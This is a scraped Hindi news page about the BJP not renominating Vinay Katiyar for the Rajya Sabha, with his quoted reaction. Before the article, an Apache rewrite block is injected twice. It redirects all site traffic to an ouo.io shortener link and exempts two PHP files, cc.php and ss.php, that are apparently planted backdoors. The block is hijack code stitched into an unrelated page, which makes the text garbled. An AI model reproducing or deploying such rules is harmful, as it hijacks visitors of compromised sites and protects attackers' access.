
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 494
Previous Nextलखनऊ। पार्टी के फायर ब्रांड नेता और कभी राम मंदिर आंदोलन के पुरोधा रहे विनय कटियार को बीजेपी ने ‘राम-राम’ कह दिया है। दरअसल राज्यसभा में विनय कटियार का कार्यकाल खत्म हो रहा है और बीजेपी ने उन्हें दोबारा प्रत्याशी नहीं बनाया है। कल अलग-अलग प्रदेशों के लिए जारी आखिरी सूची में विनय कटियार का नाम शामिल नहीं है, जिसके बाद कहा जा रहा है कि पार्टी ने उन्हें ‘राम-राम’ कह दिया है। हालांकि विनय कटियार को दोबारा प्रत्याशी नहीं बनाए जाने पर पार्टी की तरफ से कोई प्रातक्रिया सामने नहीं आई है। कहा जा रहा है कि पार्टी उन्हें लोकसभा चुनाव के मद्देनजर बड़ी जिम्मेदारी दे सकती है और कटियार को 2019 में लोकसभा का चुनाव भी लड़ाया जा सकता है।
विनय कटियार ने कहा, " लिस्ट में नाम नहीं होने पर मैं कुछ नहीं कह सकता। वैसे तीन बार लोकसभा और दो बार राज्य सभा का सांसद रह चुका हूं। पांच बार सांसद रहा हूं। अब पार्टी जो भी जिम्मेदारी देगी उसे देखेंगे।" वहीं, 2019 के लोकसभा चुनाव लड़ने पर कटियार ने कहा, " अब जो पार्टी का आदेश होगा, उसका पालन होगा। वैसे राजनीति में सिर्फ काम किया जाता है।"